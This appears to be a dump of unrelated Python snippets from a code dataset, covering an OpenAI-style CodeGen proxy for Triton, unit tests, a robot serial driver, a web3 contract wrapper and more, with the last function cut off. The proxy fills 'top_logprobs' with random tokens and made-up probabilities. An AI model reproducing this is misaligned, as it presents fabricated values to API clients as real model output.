code stringlengths 281 23.7M |
|---|
class CodeGenProxy:
    """Proxy that turns OpenAI-style completion requests into Triton inference
    calls against a CodeGen model and formats the results back into
    OpenAI-compatible completion payloads.

    BUG FIX: ``prepare_tensor``, ``trim_with_stopwords``,
    ``to_word_list_format`` and ``random_completion_id`` are invoked through
    ``self.``/the class but had lost their ``@staticmethod`` decorators, which
    would mis-bind the first positional argument. The decorators are restored.
    """

    def __init__(self, host: str = 'triton', port: int = 8001, verbose: bool = False):
        """Connect to the Triton server and load the CodeGen tokenizer."""
        self.tokenizer = Tokenizer.from_file('/python-docker/cgtok/tokenizer.json')
        self.client = client_util.InferenceServerClient(url=f'{host}:{port}', verbose=verbose)
        # GPT-2/CodeGen end-of-text token id, also used as start/end/pad id.
        self.PAD_CHAR = 50256
        # Maximum context length (prompt + completion tokens).
        self.MAX_MODEL_LEN = 2048

    class TokensExceedsMaximum(Exception):
        """Raised when prompt + requested completion exceeds MAX_MODEL_LEN."""
        pass

    @staticmethod
    def prepare_tensor(name: str, tensor_input):
        """Wrap a numpy array as a Triton InferInput named *name*."""
        t = client_util.InferInput(name, tensor_input.shape, np_to_triton_dtype(tensor_input.dtype))
        t.set_data_from_numpy(tensor_input)
        return t

    @staticmethod
    def trim_with_stopwords(output: str, stopwords: list) -> str:
        """Strip the longest matching stopword suffix from *output*, if any."""
        for w in sorted(stopwords, key=len, reverse=True):
            if output.endswith(w):
                output = output[:-len(w)]
                break
        return output

    @staticmethod
    def to_word_list_format(word_dict, tokenizer):
        """Encode stop/bad word lists into the int32 (ids, offsets) tensor
        layout the backend expects: shape (batch, 2, pad_to)."""
        flat_ids = []
        offsets = []
        for word_dict_item in word_dict:
            item_flat_ids = []
            item_offsets = []
            for word in word_dict_item:
                ids = tokenizer.encode(word).ids
                if len(ids) == 0:
                    continue
                item_flat_ids += ids
                item_offsets.append(len(ids))
                # Also register the explicit double-newline token pair, since
                # the tokenizer may encode '\n\n' differently in context.
                if word == '\n\n':
                    item_flat_ids += [198, 198]
                    item_offsets.append(2)
            flat_ids.append(np.array(item_flat_ids))
            offsets.append(np.cumsum(np.array(item_offsets)))
        pad_to = max(1, max(len(ids) for ids in flat_ids))
        for i, (ids, offs) in enumerate(zip(flat_ids, offsets)):
            flat_ids[i] = np.pad(ids, (0, pad_to - len(ids)), constant_values=0)
            offsets[i] = np.pad(offs, (0, pad_to - len(offs)), constant_values=-1)
        return np.array([flat_ids, offsets], dtype='int32').transpose((1, 0, 2))

    def generate(self, data):
        """Run one completion request against Triton.

        Returns ``(completion, choices)``: the OpenAI-style envelope (id and
        choices filled in later by the response helpers) and the generated
        texts with optional logprob information.

        Raises:
            TokensExceedsMaximum: if prompt + max_tokens > MAX_MODEL_LEN.
        """
        prompt = data['prompt']
        n = data.get('n', 1)
        model_name = data['model']
        # The 'py-' (python backend) models take int32 inputs, others uint32.
        np_type = np.int32 if model_name.startswith('py-') else np.uint32
        input_start_ids = np.expand_dims(self.tokenizer.encode(prompt).ids, 0)
        input_start_ids = np.repeat(input_start_ids, n, axis=0).astype(np_type)
        prompt_len = input_start_ids.shape[1]
        input_len = prompt_len * np.ones([input_start_ids.shape[0], 1]).astype(np_type)
        max_tokens = data.get('max_tokens', 16)
        prompt_tokens: int = input_len[0][0]
        requested_tokens = max_tokens + prompt_tokens
        if requested_tokens > self.MAX_MODEL_LEN:
            # (Removed a leftover debug `print(1)` that was here.)
            raise self.TokensExceedsMaximum(f"This model's maximum context length is {self.MAX_MODEL_LEN}, however you requested {requested_tokens} tokens ({prompt_tokens} in your prompt; {max_tokens} for the completion). Please reduce your prompt; or completion length.")
        output_len = np.ones_like(input_len).astype(np_type) * max_tokens
        num_logprobs = data.get('logprobs', -1)
        if num_logprobs is None:
            num_logprobs = -1
        want_logprobs = num_logprobs > 0
        temperature = data.get('temperature', 0.2)
        if temperature == 0.0:
            # Sampling at T=0 is undefined; emulate greedy via top_k=1.
            temperature = 1.0
            top_k = 1
        else:
            top_k = data.get('top_k', 0)
        top_p = data.get('top_p', 1.0)
        frequency_penalty = data.get('frequency_penalty', 1.0)
        # All runtime parameters are broadcast to one row per batch entry.
        runtime_top_k = top_k * np.ones([input_start_ids.shape[0], 1]).astype(np_type)
        runtime_top_p = top_p * np.ones([input_start_ids.shape[0], 1]).astype(np.float32)
        beam_search_diversity_rate = 0.0 * np.ones([input_start_ids.shape[0], 1]).astype(np.float32)
        random_seed = np.random.randint(0, (2 ** 31) - 1, (input_start_ids.shape[0], 1), dtype=np.int32)
        temperature = temperature * np.ones([input_start_ids.shape[0], 1]).astype(np.float32)
        len_penalty = 1.0 * np.ones([input_start_ids.shape[0], 1]).astype(np.float32)
        repetition_penalty = frequency_penalty * np.ones([input_start_ids.shape[0], 1]).astype(np.float32)
        is_return_log_probs = want_logprobs * np.ones([input_start_ids.shape[0], 1]).astype(np.bool_)
        beam_width = (1 * np.ones([input_start_ids.shape[0], 1])).astype(np_type)
        start_ids = self.PAD_CHAR * np.ones([input_start_ids.shape[0], 1]).astype(np_type)
        end_ids = self.PAD_CHAR * np.ones([input_start_ids.shape[0], 1]).astype(np_type)
        stop_words = data.get('stop', [])
        if stop_words is None:
            stop_words = []
        if stop_words:
            stop_word_list = np.repeat(self.to_word_list_format([stop_words], self.tokenizer), input_start_ids.shape[0], axis=0)
        else:
            # Sentinel "no stop words": ids row of 0, offsets row of -1.
            stop_word_list = np.concatenate([np.zeros([input_start_ids.shape[0], 1, 1]).astype(np.int32), (-1 * np.ones([input_start_ids.shape[0], 1, 1])).astype(np.int32)], axis=1)
        bad_words_list = np.concatenate([np.zeros([input_start_ids.shape[0], 1, 1]).astype(np.int32), (-1 * np.ones([input_start_ids.shape[0], 1, 1])).astype(np.int32)], axis=1)
        inputs = [self.prepare_tensor('input_ids', input_start_ids), self.prepare_tensor('input_lengths', input_len), self.prepare_tensor('request_output_len', output_len), self.prepare_tensor('runtime_top_k', runtime_top_k), self.prepare_tensor('runtime_top_p', runtime_top_p), self.prepare_tensor('beam_search_diversity_rate', beam_search_diversity_rate), self.prepare_tensor('random_seed', random_seed), self.prepare_tensor('temperature', temperature), self.prepare_tensor('len_penalty', len_penalty), self.prepare_tensor('repetition_penalty', repetition_penalty), self.prepare_tensor('is_return_log_probs', is_return_log_probs), self.prepare_tensor('beam_width', beam_width), self.prepare_tensor('start_id', start_ids), self.prepare_tensor('end_id', end_ids), self.prepare_tensor('bad_words_list', bad_words_list), self.prepare_tensor('stop_words_list', stop_word_list)]
        result = self.client.infer(model_name, inputs)
        output_data = result.as_numpy('output_ids')
        if output_data is None:
            raise RuntimeError('No output data')
        output_data = output_data.squeeze(1)  # drop the beam dimension
        if want_logprobs:
            lp_data = result.as_numpy('output_log_probs').squeeze(1)
        else:
            lp_data = [None] * output_data.shape[0]
        sequence_lengths = result.as_numpy('sequence_length').squeeze(1)
        gen_len = sequence_lengths - input_len.squeeze(1)
        # Decode only the newly-generated span, skipping the echoed prompt.
        decoded = self.tokenizer.decode_batch([out[prompt_len:prompt_len + g] for g, out in zip(gen_len, output_data)])
        trimmed = [self.trim_with_stopwords(d, stop_words) for d in decoded]
        choices = []
        for i, (text, tokens, lps, g) in enumerate(zip(trimmed, output_data, lp_data, gen_len)):
            reason = 'length' if max_tokens == g else 'stop'
            if lps is not None:
                tokens_str = [self.tokenizer.decode([t]) for t in tokens[prompt_len:prompt_len + g]]
                offsets = [len(prompt)] + (np.cumsum([len(t) for t in tokens_str]) + len(prompt)).tolist()[:-1]
                top_logprobs = []
                for ii, t in enumerate(tokens_str):
                    # Only the chosen token's logprob is available; pad the
                    # dict with random filler tokens so clients get the
                    # `logprobs`-many entries the API promises.
                    fakedict = {}
                    top_token_lp = float(lps[ii])
                    fakedict[t] = top_token_lp
                    while len(fakedict) < num_logprobs:
                        random_token = random.randint(0, self.tokenizer.get_vocab_size() - 1)
                        random_token_str = self.tokenizer.decode([random_token])
                        if random_token_str in fakedict:
                            continue
                        random_token_lp = top_token_lp - random.random()
                        fakedict[random_token_str] = random_token_lp
                    top_logprobs.append(fakedict)
                lpdict = {'token_logprobs': lps.tolist(), 'top_logprobs': top_logprobs, 'tokens': tokens_str, 'text_offset': offsets}
            else:
                lpdict = None
            choice = {'text': text, 'index': i, 'finish_reason': reason, 'logprobs': lpdict}
            choices.append(choice)
        completion = {'id': None, 'model': 'codegen', 'object': 'text_completion', 'created': int(time.time()), 'choices': None, 'usage': {'completion_tokens': int(gen_len.sum()), 'prompt_tokens': int(prompt_len), 'total_tokens': int(gen_len.sum() + prompt_len)}}
        return (completion, choices)

    @staticmethod
    def random_completion_id():
        """Return an OpenAI-style completion id: 'cmpl-' + 29 random chars."""
        return 'cmpl-' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(29))

    def streamed_response(self, completion, choices):
        """Yield one JSON completion per choice, then the '[DONE]' marker."""
        for c in choices:
            completion['id'] = self.random_completion_id()
            completion['choices'] = [c]
            yield f'{json.dumps(completion)}'
        yield '[DONE]'

    def non_streamed_response(self, completion, choices) -> str:
        """Return the full completion (all choices) as a single JSON string."""
        completion['id'] = self.random_completion_id()
        completion['choices'] = choices
        return json.dumps(completion)

    def __call__(self, data: dict):
        """Run generation for *data* and return a streamed or plain response."""
        st = time.time()
        try:
            completion, choices = self.generate(data)
        except InferenceServerException as exc:
            print(exc)
            if exc.status() == 'StatusCode.UNAVAILABLE':
                print(f"WARNING: Model '{data['model']}' is not available. Please ensure that `model` is set to either 'fastertransformer' or 'py-model' depending on your installation")
            completion = {}
            choices = []
        ed = time.time()
        print(f'Returned completion in {(ed - st) * 1000} ms')
        if data.get('stream', False):
            return self.streamed_response(completion, choices)
        else:
            return self.non_streamed_response(completion, choices)
def test_correct_number_of_rows_are_generated():
    """gen.generate(..., count=50) must produce a DataFrame of exactly 50 rows."""
    df = gen.generate(props={'region': gen.choice(data=['EMEA', 'LATAM', 'NAM', 'APAC'], weights=[0.1, 0.1, 0.3, 0.5]), 'country': gen.country_codes(region_field='region'), 'contact_name': gen.person(country_field='country')}, count=50, randomstate=np.random.RandomState()).to_dataframe()
    # BUG FIX: the test previously built the frame but asserted nothing,
    # so it could never fail. Pin the row count its name promises.
    assert len(df) == 50
def verbosity_to_loglevel(verbosity, *, maxlevel=logging.CRITICAL):
    """Map a -v/-q style verbosity count to a ``logging`` level.

    Each unit of *verbosity* lowers the level by 10 (one logging step)
    starting from *maxlevel*; the result is clamped to ``[1, maxlevel]``.
    *maxlevel* may also be given as a level-name string.

    Raises:
        ValueError: if a string *maxlevel* is not a valid level name.
    """
    assert maxlevel is not None
    if isinstance(maxlevel, str):
        _maxlevel = get_valid_loglevel(maxlevel)
        if _maxlevel is None:
            raise ValueError(f'unsupported maxlevel {maxlevel!r}')
        # BUG FIX: was `maxlevel = maxlevel`, a no-op that left the string in
        # place and broke the arithmetic below.
        maxlevel = _maxlevel
    elif logging.getLevelName(maxlevel).startswith('Level '):
        # Numeric level with no registered name: round down to the nearest
        # standard multiple of 10.
        if maxlevel % 10:
            maxlevel -= maxlevel % 10
    return max(1, min(maxlevel, maxlevel - verbosity * 10))
_type_check
def test_trap_protocol_receiving_log(caplog) -> None:
    """Receiving a datagram must log a marker line plus a hexdump of the payload."""
    receiver = tpt.SNMPTrapReceiverProtocol(lambda _: None)  # callback is irrelevant here
    with caplog.at_level(logging.DEBUG):
        receiver.datagram_received(b'trap-packet', ('192.0.2.1', 42))
    # '74 72 61' is the hex of the leading b'tra' of the payload.
    assert 'Received packet' in caplog.text
    assert '74 72 61' in caplog.text, 'hexdump of trap-packet not found'
class ForCursorA(StmtCursorA):
    """Statement cursor that normalizes `for`-loop patterns before delegating."""

    def _cursor_call(self, loop_pattern, all_args):
        """Rewrite *loop_pattern* into canonical ``for <name> in _: _ #<count>``
        form when possible, delegate, and verify a ForCursor came back.

        Raises via ``self.err`` when the resolved cursor is not a ForCursor.
        """
        try:
            name, count = NameCountA()(loop_pattern, all_args)
            count = f' #{count}' if count is not None else ''
            loop_pattern = f'for {name} in _: _{count}'
        except Exception:
            # Normalization is best-effort; fall back to the raw pattern.
            # (BUG FIX: was a bare `except:`, which would also swallow
            # KeyboardInterrupt / SystemExit.)
            pass
        cursor = super()._cursor_call(loop_pattern, all_args)
        if not isinstance(cursor, PC.ForCursor):
            self.err(f'expected a ForCursor, not {type(cursor)}')
        return cursor
# NOTE(review): the next line reads as a bare call `_app.callback(...)` —
# it looks like a Dash callback decorator whose leading '@...' prefix was
# lost (compare the stripped decorators elsewhere in this file). Confirm
# against version control and restore the `@` form.
_app.callback(Output('opt-result', 'children'), Input('finish-otp', 'n_clicks'), State('psa-pin', 'value'), State('psa-code', 'value'))
def finishOtp(n_clicks, code_pin, sms_code):
    """Finalize OTP setup: exchange the SMS code + PIN for an OTP session,
    persist the config, start remote control, and return a Dash alert."""
    ctx = callback_context
    if ctx.triggered:
        try:
            otp_session = new_otp_session(sms_code, code_pin, app.myp.remote_client.otp)
            app.myp.remote_client.otp = otp_session
            app.myp.save_config()
            app.start_remote_control()
            return dbc.Alert(['OTP config finish !!! ', html.A('Go to home', href=request.url_root)], color='success')
        except Exception as e:
            # Show the failure reason to the user and keep the full
            # traceback in the server log.
            res = str(e)
            logger.exception('finishOtp:')
        return dbc.Alert(res, color='danger')
    # Initial (non-triggered) callback invocation: do not update the output.
    raise PreventUpdate()
def setup_texas_wind_map(ax, region=(-107, -93, 25.5, 37), coastlines=True, **kwargs):
    """Configure *ax* as a PlateCarree map of the Texas wind region.

    Extra keyword arguments are accepted but ignored (backward compatibility).
    """
    if kwargs:
        warnings.warn('All kwargs are being ignored. They are accepted to '
                      'guarantee backward compatibility.', stacklevel=2)
    longitude_ticks = np.arange(-106, -92, 3)
    latitude_ticks = np.arange(27, 38, 3)
    _setup_map(ax, xticks=longitude_ticks, yticks=latitude_ticks,
               coastlines=coastlines, region=region, crs=ccrs.PlateCarree())
def extractTalesofDreamwidthOrg(item):
    """Parse a feed *item* into a release message.

    Returns None for previews or titles without volume/chapter info,
    a release message for known tags, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    is_preview = 'preview' in item['title'].lower()
    if is_preview or not (chp or vol):
        return None
    if 'WATTT' in item['tags']:
        return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
    return False
class OptionSeriesAreaSonificationTracksMapping(Options):
    """Mapping options for area-series sonification tracks.

    Each accessor returns the corresponding sub-configuration object.
    BUG FIX: the class defined ``text`` twice (a getter immediately shadowed
    by a setter) — clearly the remnants of a stripped ``@property`` /
    ``@text.setter`` pair, which is restored here.
    """

    def frequency(self) -> 'OptionSeriesAreaSonificationTracksMappingFrequency':
        """Frequency mapping sub-configuration."""
        return self._config_sub_data('frequency', OptionSeriesAreaSonificationTracksMappingFrequency)

    def gapBetweenNotes(self) -> 'OptionSeriesAreaSonificationTracksMappingGapbetweennotes':
        """Gap-between-notes mapping sub-configuration."""
        return self._config_sub_data('gapBetweenNotes', OptionSeriesAreaSonificationTracksMappingGapbetweennotes)

    def highpass(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpass':
        """High-pass filter mapping sub-configuration."""
        return self._config_sub_data('highpass', OptionSeriesAreaSonificationTracksMappingHighpass)

    def lowpass(self) -> 'OptionSeriesAreaSonificationTracksMappingLowpass':
        """Low-pass filter mapping sub-configuration."""
        return self._config_sub_data('lowpass', OptionSeriesAreaSonificationTracksMappingLowpass)

    def noteDuration(self) -> 'OptionSeriesAreaSonificationTracksMappingNoteduration':
        """Note-duration mapping sub-configuration."""
        return self._config_sub_data('noteDuration', OptionSeriesAreaSonificationTracksMappingNoteduration)

    def pan(self) -> 'OptionSeriesAreaSonificationTracksMappingPan':
        """Stereo-pan mapping sub-configuration."""
        return self._config_sub_data('pan', OptionSeriesAreaSonificationTracksMappingPan)

    def pitch(self) -> 'OptionSeriesAreaSonificationTracksMappingPitch':
        """Pitch mapping sub-configuration."""
        return self._config_sub_data('pitch', OptionSeriesAreaSonificationTracksMappingPitch)

    def playDelay(self) -> 'OptionSeriesAreaSonificationTracksMappingPlaydelay':
        """Play-delay mapping sub-configuration."""
        return self._config_sub_data('playDelay', OptionSeriesAreaSonificationTracksMappingPlaydelay)

    def rate(self) -> 'OptionSeriesAreaSonificationTracksMappingRate':
        """Rate mapping sub-configuration."""
        return self._config_sub_data('rate', OptionSeriesAreaSonificationTracksMappingRate)

    @property
    def text(self):
        """Text mapping value (None when unset)."""
        return self._config_get(None)

    @text.setter
    def text(self, text: str):
        self._config(text, js_type=False)

    def time(self) -> 'OptionSeriesAreaSonificationTracksMappingTime':
        """Time mapping sub-configuration."""
        return self._config_sub_data('time', OptionSeriesAreaSonificationTracksMappingTime)

    def tremolo(self) -> 'OptionSeriesAreaSonificationTracksMappingTremolo':
        """Tremolo mapping sub-configuration."""
        return self._config_sub_data('tremolo', OptionSeriesAreaSonificationTracksMappingTremolo)

    def volume(self) -> 'OptionSeriesAreaSonificationTracksMappingVolume':
        """Volume mapping sub-configuration."""
        return self._config_sub_data('volume', OptionSeriesAreaSonificationTracksMappingVolume)
class TestSentimentAnalysisDataClass:
    """Validation tests for SentimentAnalysisDataClass normalization.

    BUG FIX: the parametrize line had lost its ``@pytest.mark.`` prefix
    (it started with a bare ``.parametrize(``, a SyntaxError); the
    decorator is restored unchanged.
    """
    ITEMS = [SegmentSentimentAnalysisDataClass(segment='Valid Segement', sentiment='Positive', sentiment_rate=0.5)]

    @pytest.mark.parametrize(('kwargs', 'expected'), [_assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.POSITIVE.value, general_sentiment_rate=0, expected={'sentiment': 'Positive', 'sentiment_rate': 0.0}), _assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.NEGATIVE.value, general_sentiment_rate=1.0, expected={'sentiment': 'Negative', 'sentiment_rate': 1.0}), _assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.NEUTRAL.value, general_sentiment_rate=0.578, expected={'sentiment': 'Neutral', 'sentiment_rate': 0.58}), _assign_markers_parametrize(items=ITEMS, general_sentiment='neutral', general_sentiment_rate=None, expected={'sentiment': 'Neutral', 'sentiment_rate': None})], ids=['test_with_sentiment_positive_enum_rate_0', 'test_with_sentiment_negative_enum_rate_1.00', 'test_with_sentiment_neutral_enum_rate_0.578', 'test_with_sentiment_neutral_rate_none'])
    def test_valid_input(self, kwargs, expected):
        """Constructing the dataclass must normalize sentiment and rate."""
        klass = SentimentAnalysisDataClass(**kwargs)
        assert (klass.general_sentiment == expected['sentiment']), "The value of `sentiment` must be in ['Positive', 'Negative', 'Neutral']"
        assert (klass.general_sentiment_rate == expected['sentiment_rate']), 'The value of `sentiment_rate` must be rounded to the hundredth'
class MyAgv(DataProcessor):
    """Driver for the myAGV mobile base.

    Speaks the AGV's framed serial protocol (0xFE 0xFE header, payload,
    trailing checksum/length byte) over a UART and exposes motion, LED and
    telemetry commands.
    """

    def __init__(self, port='/dev/ttyAMA0', baudrate='115200', timeout=0.1, debug=False):
        """Open the serial link; *debug* enables verbose protocol logging."""
        self.debug = debug
        setup_logging(self.debug)
        self.log = logging.getLogger(__name__)
        self._serial_port = serial.Serial()
        self._serial_port.port = port
        self._serial_port.baudrate = baudrate
        self._serial_port.timeout = timeout
        self._serial_port.rts = False
        self._serial_port.open()

    def _write(self, command):
        """Discard stale input, then send the *command* bytes to the AGV."""
        self._serial_port.reset_input_buffer()
        self.log.debug('_write: {}'.format([hex(i) for i in command]))
        self._serial_port.write(command)
        self._serial_port.flush()

    def _read(self, command):
        """Read one reply frame for *command* within a 0.2 s window.

        Scans byte-by-byte for the 0xFE 0xFE header, then collects the
        payload until the expected frame length (`end`) is reached; the
        length depends on which command was sent.
        """
        datas = b''
        k = 0
        pre = 0
        end = 5
        t = time.time()
        # The 29-byte MCU-info request gets a correspondingly long reply.
        if command[k - 1] == 29:
            end = 29
        while (time.time() - t) < 0.2:
            data = self._serial_port.read()
            k += 1
            if len(datas) == 4:
                # Replies whose 3rd/4th bytes are 0x01/0x05 carry two
                # extra bytes — presumably the motor-current frame; TODO
                # confirm against the protocol spec.
                if (datas[-2] == 1) and (datas[-1] == 5):
                    end = 7
                datas += data
            elif len(datas) == end:
                datas += data
                break
            elif len(datas) > 4:
                datas += data
            elif len(datas) >= 2:
                data_len = struct.unpack('b', data)[0]
                if (command[-1] == 29) or (data_len == command[k - 1]):
                    datas += data
                else:
                    # Length byte does not match: restart the header search.
                    datas = b''
                    k = 0
                    pre = 0
            elif data == b'\xfe':
                if datas == b'':
                    datas += data
                    if k != 1:
                        k = 1
                    pre = k
                elif (k - 1) == pre:
                    datas += data
                else:
                    datas = b'\xfe'
                    k = 1
                    pre = 0
            else:
                datas = b''
        self.log.debug('_read: {}'.format([hex(data) for data in datas]))
        return datas

    def _mesg(self, genre, *args, **kwargs):
        """Build, checksum and send one command frame; optionally decode a reply.

        *genre* is a ProtocolCode value (or a raw list of bytes for motion
        commands); pass ``has_reply=True`` to read and decode the response.
        """
        has_reply = kwargs.get('has_reply', None)
        real_command = self._process_data_command(genre, self.__class__.__name__, args)
        command = [ProtocolCode.HEADER.value, ProtocolCode.HEADER.value]
        if isinstance(genre, list):
            for data in genre:
                command.append(data)
        else:
            command.append(genre)
        command.append(real_command)
        command = self._flatten(command)
        # Trailing byte: a fixed length code for the query commands,
        # otherwise an 8-bit checksum over everything after the header.
        if genre == ProtocolCode.SET_LED.value:
            command.append(sum(command[2:]) & 255)
        elif genre == ProtocolCode.GET_FIRMWARE_VERSION.value:
            command.append(4)
        elif genre == ProtocolCode.GET_MOTORS_CURRENT.value:
            command.append(5)
        elif genre == ProtocolCode.GET_BATTERY_INFO.value:
            command.append(6)
        else:
            command.append(sum(command[2:]) & 255)
        self._write(command)
        if has_reply:
            data = self._read(command)
            if data:
                if genre == ProtocolCode.GET_FIRMWARE_VERSION.value:
                    return self._int2coord(data[4])
                elif genre == ProtocolCode.GET_MOTORS_CURRENT.value:
                    return self._decode_int16(data[4:6])
                # BUG FIX: this branch previously tested the truthy constant
                # `ProtocolCode.GET_BATTERY_INFO.value` instead of comparing
                # it with `genre`, so it matched every remaining genre.
                elif genre == ProtocolCode.GET_BATTERY_INFO.value:
                    # data[4] is a 6-bit status bitfield, data[5]/data[6]
                    # the two battery voltages.
                    byte_1 = bin(data[4])[2:]
                    res = []
                    while len(byte_1) != 6:
                        byte_1 = '0' + byte_1
                    res.append(byte_1)
                    res.append(self._int2coord(data[5]))
                    res.append(self._int2coord(data[6]))
                    # A cleared flag bit means the matching battery reading
                    # is invalid; zero it out.
                    if byte_1[0] == '0':
                        res[-1] = 0
                    elif byte_1[1] == '0':
                        res[1] = 0
                    return res
            return None

    def set_led(self, mode, R, G, B):
        """Set the LED strip to RGB color (R, G, B) in the given *mode*."""
        calibration_parameters(class_name=self.__class__.__name__, rgb=[R, G, B], led_mode=mode)
        return self._mesg(ProtocolCode.SET_LED.value, mode, R, G, B)

    def get_firmware_version(self):
        """Query and return the firmware version."""
        return self._mesg(ProtocolCode.GET_FIRMWARE_VERSION.value, has_reply=True)

    def get_motors_current(self):
        """Query and return the motors' current draw."""
        return self._mesg(ProtocolCode.GET_MOTORS_CURRENT.value, has_reply=True)

    def get_battery_info(self):
        """Query battery info: [status bitfield string, voltage1, voltage2]."""
        return self._mesg(ProtocolCode.GET_BATTERY_INFO.value, has_reply=True)

    def go_ahead(self, go_speed, timeout=5):
        """Drive forward at *go_speed* for *timeout* seconds, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, data=go_speed)
        t = time.time()
        # Motion commands must be re-sent continuously (every 0.1 s).
        while (time.time() - t) < timeout:
            self._mesg(128 + go_speed, 128, 128)
            time.sleep(0.1)
        self.stop()

    def retreat(self, back_speed, timeout=5):
        """Drive backward at *back_speed* for *timeout* seconds, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, data=back_speed)
        t = time.time()
        while (time.time() - t) < timeout:
            self._mesg(128 - back_speed, 128, 128)
            time.sleep(0.1)
        self.stop()

    def pan_left(self, pan_left_speed, timeout=5):
        """Strafe left at *pan_left_speed* for *timeout* seconds, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, data=pan_left_speed)
        t = time.time()
        while (time.time() - t) < timeout:
            self._mesg(128, 128 + pan_left_speed, 128)
            time.sleep(0.1)
        self.stop()

    def pan_right(self, pan_right_speed, timeout=5):
        """Strafe right at *pan_right_speed* for *timeout* seconds, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, pan_right_speed=pan_right_speed)
        t = time.time()
        while (time.time() - t) < timeout:
            self._mesg(128, 128 - pan_right_speed, 128)
            time.sleep(0.1)
        self.stop()

    def clockwise_rotation(self, rotate_right_speed, timeout=5):
        """Rotate clockwise at *rotate_right_speed* for *timeout* s, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, rotate_right_speed=rotate_right_speed)
        t = time.time()
        while (time.time() - t) < timeout:
            self._mesg(128, 128, 128 - rotate_right_speed)
            time.sleep(0.1)
        self.stop()

    def counterclockwise_rotation(self, rotate_left_speed, timeout=5):
        """Rotate counterclockwise at *rotate_left_speed* for *timeout* s, then stop."""
        calibration_parameters(class_name=self.__class__.__name__, rotate_left_speed=rotate_left_speed)
        t = time.time()
        while (time.time() - t) < timeout:
            self._mesg(128, 128, 128 + rotate_left_speed)
            time.sleep(0.1)
        self.stop()

    def stop(self):
        """Halt all motion (neutral 128/128/128 command)."""
        self._mesg(128, 128, 128)

    def get_mcu_info(self):
        """Request and decode the 29-byte MCU status frame.

        Returns a list mixing raw bytes (indices < 5), decoded int16 pairs,
        a 6-bit status bitfield string (index 17) and scaled byte values
        (indices 18-19).
        """
        datas = self._read([254, 254, 29])
        res = []
        index = 2
        while index < (len(datas) - 2):
            if index < 5:
                res.append(datas[index])
                index += 1
            elif (index < 17) or (index >= 20):
                res.append(self._decode_int16(datas[index:index + 2]))
                index += 2
            elif index == 17:
                # Zero-pad the status byte to a 6-bit string.
                byte_1 = bin(datas[index])[2:]
                while len(byte_1) != 6:
                    byte_1 = '0' + byte_1
                res.append(byte_1)
                index += 1
            elif index < 20:
                res.append(self._int2coord(datas[index]))
                index += 1
        return res

    def restore(self):
        """Ask the AGV firmware to run its restore routine."""
        self._mesg(ProtocolCode.RESTORE.value, 1)
class Contract(BaseContract):
    """A deployed-contract wrapper bound to one web3 instance.

    Contract classes are produced via the :meth:`factory` classmethod (which
    binds ``w3``, abi, bytecode, ...) and instantiated per on-chain address.

    BUG FIX: ``factory``, ``constructor``, ``find_functions_by_identifier``
    and ``get_function_by_identifier`` take ``cls`` but had lost their
    ``@classmethod`` decorators (apparently stripped), so calling them on the
    class would mis-bind the first argument. The decorators are restored.
    """
    w3: 'Web3'
    functions: ContractFunctions = None
    caller: 'ContractCaller' = None
    events: ContractEvents = None

    def __init__(self, address: Optional[ChecksumAddress] = None) -> None:
        """Bind this contract class to *address* and build the accessors.

        Raises:
            AttributeError: if the class was not created via `web3.contract`.
            TypeError: if no address is available.
        """
        _w3 = self.w3
        if _w3 is None:
            raise AttributeError('The `Contract` class has not been initialized. Please use the `web3.contract` interface to create your contract class.')
        if address:
            self.address = normalize_address(cast('ENS', _w3.ens), address)
        if not self.address:
            raise TypeError('The address argument is required to instantiate a contract.')
        self.functions = ContractFunctions(self.abi, _w3, self.address, decode_tuples=self.decode_tuples)
        self.caller = ContractCaller(self.abi, _w3, self.address, decode_tuples=self.decode_tuples)
        self.events = ContractEvents(self.abi, _w3, self.address)
        self.fallback = Contract.get_fallback_function(self.abi, _w3, ContractFunction, self.address)
        self.receive = Contract.get_receive_function(self.abi, _w3, ContractFunction, self.address)

    @classmethod
    def factory(cls, w3: 'Web3', class_name: Optional[str] = None, **kwargs: Any) -> Type[Self]:
        """Create a new contract class bound to *w3* (abi/bytecode via kwargs)."""
        kwargs['w3'] = w3
        normalizers = {'abi': normalize_abi, 'address': partial(normalize_address, w3.ens), 'bytecode': normalize_bytecode, 'bytecode_runtime': normalize_bytecode}
        contract = cast(Type[Self], PropertyCheckingFactory((class_name or cls.__name__), (cls,), kwargs, normalizers=normalizers))
        contract.functions = ContractFunctions(contract.abi, contract.w3, decode_tuples=contract.decode_tuples)
        contract.caller = ContractCaller(contract.abi, contract.w3, contract.address, decode_tuples=contract.decode_tuples)
        contract.events = ContractEvents(contract.abi, contract.w3)
        contract.fallback = Contract.get_fallback_function(contract.abi, contract.w3, ContractFunction)
        contract.receive = Contract.get_receive_function(contract.abi, contract.w3, ContractFunction)
        return contract

    @classmethod
    def constructor(cls, *args: Any, **kwargs: Any) -> 'ContractConstructor':
        """Build a ContractConstructor for deployment.

        Raises:
            ValueError: if the class has no bytecode bound.
        """
        if cls.bytecode is None:
            raise ValueError("Cannot call constructor on a contract that does not have 'bytecode' associated with it")
        return ContractConstructor(cls.w3, cls.abi, cls.bytecode, *args, **kwargs)

    @classmethod
    def find_functions_by_identifier(cls, contract_abi: ABI, w3: 'Web3', address: ChecksumAddress, callable_check: Callable[..., Any]) -> List['ContractFunction']:
        """Return all ContractFunctions matching *callable_check*."""
        return cast(List['ContractFunction'], find_functions_by_identifier(contract_abi, w3, address, callable_check, ContractFunction))

    @classmethod
    def get_function_by_identifier(cls, fns: Sequence['ContractFunction'], identifier: str) -> 'ContractFunction':
        """Return the single function from *fns* matching *identifier*."""
        return get_function_by_identifier(fns, identifier)
def change():
    """Interactively retune servo parameters on every connected robot.

    Prompts for a mode (1 = high precision, 2 = stabilize), then writes the
    corresponding parameter set to servos 1-6 of each robot in the global
    ``mc`` list, reading every value back to verify the write.
    """
    global mc
    mode = 1
    _mode = input('Please input mode, 1 = high precision, 2 = stabilize (default: 1 ):')
    try:
